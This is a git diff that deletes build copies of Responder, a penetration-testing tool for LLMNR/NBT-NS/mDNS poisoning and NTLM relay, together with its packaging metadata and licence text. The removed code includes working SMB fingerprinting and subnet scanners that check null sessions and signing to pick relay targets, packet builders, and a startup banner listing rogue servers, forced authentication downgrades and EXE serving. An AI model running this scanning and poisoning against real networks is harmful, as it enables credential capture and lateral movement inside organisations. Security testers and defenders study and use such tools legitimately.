Hostname = data[113:].decode('latin-1') - return Hostname, DomainJoined - except: - return "Could not get Hostname.", "Could not get Domain joined" - -def DomainGrab(Host): - global SMB1 - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(Timeout) - try: - s.connect(Host) - h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") - n = SMBNegoDataLanMan() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - if data[8:10] == b'\x72\x00': - return GetHostnameAndDomainName(data) - except IOError as e: - if e.errno == errno.ECONNRESET: - SMB1 = "False" - return False - else: - return False - -def SmbFinger(Host): - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(Timeout) - try: - s.connect(Host) - except: - pass - - try: - h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") - n = SMBNego(Data = SMBNegoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - signing = IsSigningEnabled(data) - if data[8:10] == b'\x72\x00': - head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") - t = SMBSessionFingerData() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - if data[8:10] == b'\x73\x16': - OsVersion, ClientVersion = OsNameClientVersion(NetworkRecvBufferPython2or3(data)) - return signing, OsVersion, ClientVersion - except: - pass - -def check_smb_null_session(host): - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(Timeout) - try: - s.connect(host) - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x53\xc8") - n = SMBNego(Data = SMBNegoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - if data[8:10] == b'\x72\x00': - h = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",mid="\x40\x00") - n = SMBSessionData() - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - if data[8:10] == b'\x73\x16': - h = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",uid=data[32:34].decode('latin-1'),mid="\x80\x00") - n = SMBSession2() - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - if data[8:10] == b'\x73\x00': - h = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",uid=data[32:34].decode('latin-1'),mid="\xc0\x00") - n = SMBTreeConnectData() - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - if data[8:10] == b'\x75\x00': - return 'True' - else: - return 'False' - except Exception: - return False - -################## -#SMB2 part: - -def ConnectAndChoseSMB(host): - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(Timeout) - try: - s.connect(host) - h = SMBHeader(cmd="\x72",flag1="\x00") - n = SMBNego(Data = SMB2NegoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(4096) - except: - return False - if ParseNegotiateSMB2Ans(data): - try: - while True: - s.send(NetworkSendBufferPython2or3(handle(data.decode('latin-1'), host))) - data = s.recv(4096) - if not data: - break - except Exception: - return False - else: - return False - -def handle(data, host): - if data[28:29] == "\x00": - a = SMBv2Head() - a.calculate() - b = SMBv2Negotiate() - b.calculate() - packet0 =str(a)+str(b) - buffer0 = longueur(packet0)+packet0 - return buffer0 - - if data[28:29] == "\x01": - global Bootime - SMB2SigningMandatory(data) - Bootime = IsDCVuln(GetBootTime(data[116:124]), host[0]) - a = SMBv2Head(SMBv2Command="\x01\x00",CommandSequence= "\x02\x00\x00\x00\x00\x00\x00\x00") - a.calculate() - b = SMBv2Session1() - b.calculate() - packet0 =str(a)+str(b) - buffer0 = longueur(packet0)+packet0 - return buffer0 - - if data[28:29] == "\x02": - ParseSMBNTLM2Exchange(data, host[0], Bootime, SMB2signing) - -################## -def ShowSmallResults(Host): - if ConnectAndChoseSMB((Host,445)) == False: - try: - Hostname, DomainJoined = DomainGrab((Host, 445)) - Signing, OsVer, LanManClient = SmbFinger((Host, 445)) - NullSess = check_smb_null_session((Host, 445)) - RDP = IsServiceOn((Host,3389)) - SQL = IsServiceOn((Host,1433)) - print(("[SMB1]:['{}', Os:'{}', Domain:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', MSSQL:'{}']".format(Host, OsVer, DomainJoined, Signing, NullSess,RDP, SQL))) - SaveRunFingerToDb({ - 'Protocol': '[SMB1]', - 'Host': Host, - 'WindowsVersion':OsVer, - 'OsVer': OsVer, - 'DomainJoined':DomainJoined, - 'Bootime': 'N/A', - 'Signing': Signing, - 'NullSess': NullSess, - 'IsRDPOn':RDP, - 'SMB1': 'True', - 'MSSQL': SQL - }) - except: - return False - - -def IsServiceOn(Host): - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(Timeout) - try: - s.connect(Host) - if s: - return 'True' - else: - return 'False' - - except Exception as err: - return 'False' - - -def RunFinger(Host): - if Filename != None: - with open(Filename) as fp: - Line = fp.read().splitlines() - for Ln in Line: - m = re.search("/", str(Ln)) - if m: - net,_,mask = Ln.partition('/') - mask = int(mask) - net = atod(net) - threads = [] - Pool = multiprocessing.Pool(processes=250) - func = ShowSmallResults - for host in (dtoa(net+n) for n in range(0, 1<<32-mask)): - proc = Pool.apply_async(func, ((host),)) - threads.append(proc) - for proc in threads: - proc.get() - else: - ShowSmallResults(Ln) - - if Filename == None: - m = re.search("/", str(Host)) - if m: - net,_,mask = Host.partition('/') - mask = int(mask) - net = atod(net) - threads = [] - Pool = multiprocessing.Pool(processes=250) - func = ShowSmallResults - for host in (dtoa(net+n) for n in range(0, 1<<32-mask)): - proc = Pool.apply_async(func, ((host),)) - threads.append(proc) - for proc in threads: - proc.get() - else: - ShowSmallResults(Host) - - -RunFinger(Host) diff --git a/build/lib/Responder/tools/RunFingerPackets.py b/build/lib/Responder/tools/RunFingerPackets.py deleted file mode 100644 index fb7cce2..0000000 --- a/build/lib/Responder/tools/RunFingerPackets.py +++ /dev/null @@ -1,625 +0,0 @@ -import random, struct, sys, os -from os import urandom -from socket import * -from time import sleep -from Responder.odict import OrderedDict - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -class Packet(): - fields = OrderedDict([ - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in list(kw.items()): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, list(self.fields.values()))) - -class SMBHeader(Packet): - fields = OrderedDict([ - ("proto", "\xff\x53\x4d\x42"), - ("cmd", "\x72"), - ("error-code", "\x00\x00\x00\x00" ), - ("flag1", "\x00"), - ("flag2", "\x00\x00"), - ("pidhigh", "\x00\x00"), - ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("reserved", "\x00\x00"), - ("tid", "\x00\x00"), - ("pid", "\x00\x00"), - ("uid", "\x00\x00"), - ("mid", "\x00\x00"), - ]) - -class SMBNego(Packet): - fields = OrderedDict([ - ("Wordcount", "\x00"), - ("Bcc", "\x62\x00"), - ("Data", "") - ]) - - def calculate(self): - self.fields["Bcc"] = StructWithLenPython2or3(". -import re,sys,socket,struct -import multiprocessing -from socket import * -from time import sleep -from .odict import OrderedDict - -__version__ = "0.7" - -Timeout = 2 - -class Packet(): - fields = OrderedDict([ - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in list(kw.items()): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, list(self.fields.values()))) - -#Python version -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" - -SMB1 = "Enabled" - -def StructWithLenPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, data) - #Python3... - else: - return struct.pack(endian, data).decode('latin-1') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -def longueur(payload): - length = StructWithLenPython2or3(">i", len(''.join(payload))) - return length - -class SMBHeader(Packet): - fields = OrderedDict([ - ("proto", "\xff\x53\x4d\x42"), - ("cmd", "\x72"), - ("error-code", "\x00\x00\x00\x00" ), - ("flag1", "\x00"), - ("flag2", "\x00\x00"), - ("pidhigh", "\x00\x00"), - ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("reserved", "\x00\x00"), - ("tid", "\x00\x00"), - ("pid", "\x00\x00"), - ("uid", "\x00\x00"), - ("mid", "\x00\x00"), - ]) - -class SMBNego(Packet): - fields = OrderedDict([ - ("Wordcount", "\x00"), - ("Bcc", "\x62\x00"), - ("Data", "") - ]) - - def calculate(self): - self.fields["Bcc"] = StructWithLenPython2or3(" 255: - OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - if length <= 255: - OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[46+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - except: - return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" - -def GetHostnameAndDomainName(data): - try: - data = NetworkRecvBufferPython2or3(data) - DomainJoined, Hostname = tuple([e.replace("\x00", "") for e in data[81:].split('\x00\x00\x00')[:2]]) - #If max length domain name, there won't be a \x00\x00\x00 delineator to split on - if Hostname == '': - DomainJoined = data[81:110].decode('latin-1') - Hostname = data[113:].decode('latin-1') - return Hostname, DomainJoined - except: - return "Could not get Hostname.", "Could not get Domain joined" - -def DomainGrab(Host): - global SMB1 - try: - s = socket(AF_INET, SOCK_STREAM) - s.settimeout(0.7) - s.connect(Host) - h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") - n = SMBNegoDataLanMan() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - s.close() - if data[8:10] == b'\x72\x00': - return GetHostnameAndDomainName(data) - except IOError as e: - if e.errno == errno.ECONNRESET: - SMB1 = "Disabled" - p("SMB1 is disabled on this host. Please choose another host.") - else: - return False - -def SmbFinger(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect(Host) - except: - pass - try: - h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") - n = SMBNego(Data = SMBNegoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer0)) - data = s.recv(2048) - signing = IsSigningEnabled(data) - if data[8:10] == b'\x72\x00': - head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") - t = SMBSessionFingerData() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - if data[8:10] == b'\x73\x16': - OsVersion, ClientVersion = OsNameClientVersion(NetworkRecvBufferPython2or3(data)) - return signing, OsVersion, ClientVersion - except: - pass - -def SmbFingerSigning(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect((Host, 445)) - except: - return False - try: - h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") - n = SMBNego(Data = SMBNegoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - data = s.recv(2048) - signing = IsSigningEnabled(data) - return signing - except: - pass - -################## -#run it -def ShowResults(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect(Host) - except: - return False - - try: - Hostname, DomainJoined = DomainGrab(Host) - Signing, OsVer, LanManClient = SmbFinger(Host) - enabled = color("SMB signing is mandatory. Choose another target", 1, 1) - disabled = color("SMB signing: False", 2, 1) - print(color("Retrieving information for %s..."%Host[0], 8, 1)) - print(enabled if Signing else disabled) - print(color("Os version: '%s'"%(OsVer), 8, 3)) - print(color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)) - except: - pass - -def ShowSmallResults(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect(Host) - except: - return False - - try: - Hostname, DomainJoined = DomainGrab(Host) - Signing, OsVer, LanManClient = SmbFinger(Host) - Message = color("\n[+] Client info: ['%s', domain: '%s', signing:'%s']"%(OsVer, DomainJoined, Signing),4,0) - return Message - except: - return None - - -def ShowScanSmallResults(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect(Host) - except: - return False - - try: - Hostname, DomainJoined = DomainGrab(Host) - Signing, OsVer, LanManClient = SmbFinger(Host) - Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing) - print(Message) - except: - return None - - -def ShowSigning(Host): - s = socket(AF_INET, SOCK_STREAM) - try: - s.settimeout(Timeout) - s.connect((Host, 445)) - except: - print("[Pivot Verification Failed]: Target host is down") - return True - - try: - Signing = SmbFingerSigning(Host) - if Signing == True: - print("[Pivot Verification Failed]:Signing is enabled. Choose another host.") - return True - else: - return False - except: - pass - - -def RunFinger(Host): - m = re.search("/", str(Host)) - if m : - net,_,mask = Host.partition('/') - mask = int(mask) - net = atod(net) - for host in (dtoa(net+n) for n in range(0, 1<<32-mask)): - ShowResults((host,445)) - else: - ShowResults((Host,445)) - - -def RunPivotScan(Host, CurrentIP): - m = re.search("/", str(Host)) - if m : - net,_,mask = Host.partition('/') - mask = int(mask) - net = atod(net) - threads = [] - for host in (dtoa(net+n) for n in range(0, 1<<32-mask)): - if CurrentIP == host: - pass - else: - p = multiprocessing.Process(target=ShowScanSmallResults, args=((host,445),)) - threads.append(p) - p.start() - sleep(1) - else: - ShowScanSmallResults((Host,445)) diff --git a/build/lib/Responder/tools/SMBFinger/__init__.py b/build/lib/Responder/tools/SMBFinger/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/build/lib/Responder/tools/SMBFinger/odict.py b/build/lib/Responder/tools/SMBFinger/odict.py deleted file mode 100644 index ca11f01..0000000 --- a/build/lib/Responder/tools/SMBFinger/odict.py +++ /dev/null @@ -1,124 +0,0 @@ -import sys -try: - from UserDict import DictMixin -except ImportError: - from collections import UserDict - try: - from collections import MutableMapping as DictMixin - except ImportError: - from collections.abc import MutableMapping as DictMixin - -class OrderedDict(dict, DictMixin): - - def __init__(self, *args, **kwds): - if len(args) > 1: - raise TypeError('expected at most 1 arguments, got %d' % len(args)) - try: - self.__end - except AttributeError: - self.clear() - self.update(*args, **kwds) - - def clear(self): - self.__end = end = [] - end += [None, end, end] - self.__map = {} - dict.clear(self) - - def __setitem__(self, key, value): - if key not in self: - end = self.__end - curr = end[1] - curr[2] = end[1] = self.__map[key] = [key, curr, end] - dict.__setitem__(self, key, value) - - def __delitem__(self, key): - dict.__delitem__(self, key) - key, prev, next = self.__map.pop(key) - prev[2] = next - next[1] = prev - - def __iter__(self): - end = self.__end - curr = end[2] - while curr is not end: - yield curr[0] - curr = curr[2] - - def __reversed__(self): - end = self.__end - curr = end[1] - while curr is not end: - yield curr[0] - curr = curr[1] - - def popitem(self, last=True): - if not self: - raise KeyError('dictionary is empty') - if last: - key = next(reversed(self)) - else: - key = next(iter(self)) - value = self.pop(key) - return key, value - - def __reduce__(self): - items = [[k, self[k]] for k in self] - tmp = self.__map, self.__end - del self.__map, self.__end - inst_dict = vars(self).copy() - self.__map, self.__end = tmp - if inst_dict: - return (self.__class__, (items,), inst_dict) - return self.__class__, (items,) - - def keys(self): - return list(self) - - if sys.version_info >= (3, 0): - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.keys - itervalues = DictMixin.values - iteritems = DictMixin.items - else: - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.iterkeys - itervalues = DictMixin.itervalues - iteritems = DictMixin.iteritems - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self.items())) - - def copy(self): - return self.__class__(self) - - @classmethod - def fromkeys(cls, iterable, value=None): - d = cls() - for key in iterable: - d[key] = value - return d - - def __eq__(self, other): - if isinstance(other, OrderedDict): - return len(self)==len(other) and \ - min(p==q for p, q in zip(list(self.items()), list(other.items()))) - return dict.__eq__(self, other) - - def __ne__(self, other): - return not self == other - - -if __name__ == '__main__': - d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)]) - assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh'] diff --git a/build/lib/Responder/tools/odict.py b/build/lib/Responder/tools/odict.py deleted file mode 100644 index ca11f01..0000000 --- a/build/lib/Responder/tools/odict.py +++ /dev/null @@ -1,124 +0,0 @@ -import sys -try: - from UserDict import DictMixin -except ImportError: - from collections import UserDict - try: - from collections import MutableMapping as DictMixin - except ImportError: - from collections.abc import MutableMapping as DictMixin - -class OrderedDict(dict, DictMixin): - - def __init__(self, *args, **kwds): - if len(args) > 1: - raise TypeError('expected at most 1 arguments, got %d' % len(args)) - try: - self.__end - except AttributeError: - self.clear() - self.update(*args, **kwds) - - def clear(self): - self.__end = end = [] - end += [None, end, end] - self.__map = {} - dict.clear(self) - - def __setitem__(self, key, value): - if key not in self: - end = self.__end - curr = end[1] - curr[2] = end[1] = self.__map[key] = [key, curr, end] - dict.__setitem__(self, key, value) - - def __delitem__(self, key): - dict.__delitem__(self, key) - key, prev, next = self.__map.pop(key) - prev[2] = next - next[1] = prev - - def __iter__(self): - end = self.__end - curr = end[2] - while curr is not end: - yield curr[0] - curr = curr[2] - - def __reversed__(self): - end = self.__end - curr = end[1] - while curr is not end: - yield curr[0] - curr = curr[1] - - def popitem(self, last=True): - if not self: - raise KeyError('dictionary is empty') - if last: - key = next(reversed(self)) - else: - key = next(iter(self)) - value = self.pop(key) - return key, value - - def __reduce__(self): - items = [[k, self[k]] for k in self] - tmp = self.__map, self.__end - del self.__map, self.__end - inst_dict = vars(self).copy() - self.__map, self.__end = tmp - if inst_dict: - return (self.__class__, (items,), inst_dict) - return self.__class__, (items,) - - def keys(self): - return list(self) - - if sys.version_info >= (3, 0): - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.keys - itervalues = DictMixin.values - iteritems = DictMixin.items - else: - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.iterkeys - itervalues = DictMixin.itervalues - iteritems = DictMixin.iteritems - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self.items())) - - def copy(self): - return self.__class__(self) - - @classmethod - def fromkeys(cls, iterable, value=None): - d = cls() - for key in iterable: - d[key] = value - return d - - def __eq__(self, other): - if isinstance(other, OrderedDict): - return len(self)==len(other) and \ - min(p==q for p, q in zip(list(self.items()), list(other.items()))) - return dict.__eq__(self, other) - - def __ne__(self, other): - return not self == other - - -if __name__ == '__main__': - d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)]) - assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh'] diff --git a/build/lib/Responder/utils.py b/build/lib/Responder/utils.py deleted file mode 100644 index 7c4e9de..0000000 --- a/build/lib/Responder/utils.py +++ /dev/null @@ -1,572 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import os -import sys -import re -import logging -import socket -import time -import Responder.settings as settings -import datetime -import codecs -import struct -import random -try: - import netifaces -except: - sys.exit('You need to install python-netifaces or run Responder with python3...\nTry "apt-get install python-netifaces" or "pip install netifaces"') - -from calendar import timegm - -def if_nametoindex2(name): - if settings.Config.PY2OR3 == "PY2": - import ctypes - import ctypes.util - libc = ctypes.CDLL(ctypes.util.find_library('c')) - ret = libc.if_nametoindex(name) - return ret - else: - return socket.if_nametoindex(settings.Config.Interface) - -def RandomChallenge(): - if settings.Config.PY2OR3 == "PY3": - if settings.Config.NumChal == "random": - from random import getrandbits - NumChal = b'%016x' % getrandbits(16 * 4) - Challenge = b'' - for i in range(0, len(NumChal),2): - Challenge += NumChal[i:i+2] - return codecs.decode(Challenge, 'hex') - else: - return settings.Config.Challenge - else: - if settings.Config.NumChal == "random": - from random import getrandbits - NumChal = '%016x' % getrandbits(16 * 4) - Challenge = '' - for i in range(0, len(NumChal),2): - Challenge += NumChal[i:i+2].decode("hex") - return Challenge - else: - return settings.Config.Challenge - -def HTTPCurrentDate(): - Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT') - return Date - -def SMBTime(): - dt = datetime.datetime.now() - dt = dt.replace(tzinfo=None) - if settings.Config.PY2OR3 == "PY3": - return struct.pack(" https://github.com/sponsors/lgandx") - print(" Paypal -> https://paypal.me/PythonResponder") - print('') - print(" Author: Laurent Gaffie (laurent.gaffie@gmail.com)") - print(" To kill this script hit CTRL-C") - print('') - - -def StartupMessage(): - enabled = color('[ON]', 2, 1) - disabled = color('[OFF]', 1, 1) - - print('') - print(color("[+] ", 2, 1) + "Poisoners:") - print(' %-27s' % "LLMNR" + (enabled if settings.Config.AnalyzeMode == False else disabled)) - print(' %-27s' % "NBT-NS" + (enabled if settings.Config.AnalyzeMode == False else disabled)) - print(' %-27s' % "MDNS" + (enabled if settings.Config.AnalyzeMode == False else disabled)) - print(' %-27s' % "DNS" + enabled) - print(' %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled)) - print('') - - print(color("[+] ", 2, 1) + "Servers:") - print(' %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)) - print(' %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)) - print(' %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)) - print(' %-27s' % "Auth proxy" + (enabled if settings.Config.ProxyAuth_On_Off else disabled)) - print(' %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)) - print(' %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)) - print(' %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)) - print(' %-27s' % "FTP server" + (enabled if settings.Config.FTP_On_Off else disabled)) - print(' %-27s' % "IMAP server" + (enabled if settings.Config.IMAP_On_Off else disabled)) - print(' %-27s' % "POP3 server" + (enabled if settings.Config.POP_On_Off else disabled)) - print(' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled)) - print(' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled)) - print(' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled)) - print(' %-27s' % "MQTT server" + (enabled if settings.Config.MQTT_On_Off else disabled)) - print(' %-27s' % "RDP server" + (enabled if settings.Config.RDP_On_Off else disabled)) - print(' %-27s' % "DCE-RPC server" + (enabled if settings.Config.DCERPC_On_Off else disabled)) - print(' %-27s' % "WinRM server" + (enabled if settings.Config.WinRM_On_Off else disabled)) - print(' %-27s' % "SNMP server" + (enabled if settings.Config.SNMP_On_Off else disabled)) - print('') - - print(color("[+] ", 2, 1) + "HTTP Options:") - print(' %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled)) - print(' %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled)) - print(' %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled)) - print(' %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled)) - #print(' %-27s' % "WPAD script" + settings.Config.WPAD_Script - print('') - - print(color("[+] ", 2, 1) + "Poisoning Options:") - print(' %-27s' % "Analyze Mode" + (enabled if settings.Config.AnalyzeMode else disabled)) - print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)) - print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)) - print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)) - print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled)) - print('') - - print(color("[+] ", 2, 1) + "Generic Options:") - print(' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1)) - print(' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1)) - print(' %-27s' % "Responder IPv6" + color('[%s]' % settings.Config.Bind_To6, 5, 1)) - if settings.Config.ExternalIP: - print(' %-27s' % "Responder external IP" + color('[%s]' % settings.Config.ExternalIP, 5, 1)) - if settings.Config.ExternalIP6: - print(' %-27s' % "Responder external IPv6" + color('[%s]' % settings.Config.ExternalIP6, 5, 1)) - - print(' %-27s' % "Challenge set" + color('[%s]' % settings.Config.NumChal, 5, 1)) - if settings.Config.Upstream_Proxy: - print(' %-27s' % "Upstream Proxy" + color('[%s]' % settings.Config.Upstream_Proxy, 5, 1)) - - if len(settings.Config.RespondTo): - print(' %-27s' % "Respond To" + color(str(settings.Config.RespondTo), 5, 1)) - if len(settings.Config.RespondToName): - print(' %-27s' % "Respond To Names" + color(str(settings.Config.RespondToName), 5, 1)) - if len(settings.Config.DontRespondTo): - print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)) - if len(settings.Config.DontRespondToName): - print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)) - if settings.Config.TTL == None: - print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1)) - else: - print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1)) - print('') - - print(color("[+] ", 2, 1) + "Current Session Variables:") - print(' %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1)) - print(' %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1)) - print(' %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1)) - diff --git a/responder.egg-info/PKG-INFO b/responder.egg-info/PKG-INFO deleted file mode 100644 index 64f47f4..0000000 --- a/responder.egg-info/PKG-INFO +++ /dev/null @@ -1,921 +0,0 @@ -Metadata-Version: 2.1 -Name: responder -Version: 0.0.0 -Summary: IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay. -Author-email: Laurent Gaffie -License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for - software and other kinds of works. - - The licenses for most software and other practical works are designed - to take away your freedom to share and change the works. By contrast, - the GNU General Public License is intended to guarantee your freedom to - share and change all versions of a program--to make sure it remains free - software for all its users. We, the Free Software Foundation, use the - GNU General Public License for most of our software; it applies also to - any other work released this way by its authors. You can apply it to - your programs, too. - - When we speak of free software, we are referring to freedom, not - price. Our General Public Licenses are designed to make sure that you - have the freedom to distribute copies of free software (and charge for - them if you wish), that you receive source code or can get it if you - want it, that you can change the software or use pieces of it in new - free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you - these rights or asking you to surrender the rights. Therefore, you have - certain responsibilities if you distribute copies of the software, or if - you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether - gratis or for a fee, you must pass on to the recipients the same - freedoms that you received. You must make sure that they, too, receive - or can get the source code. And you must show them these terms so they - know their rights. - - Developers that use the GNU GPL protect your rights with two steps: - (1) assert copyright on the software, and (2) offer you this License - giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains - that there is no warranty for this free software. For both users' and - authors' sake, the GPL requires that modified versions be marked as - changed, so that their problems will not be 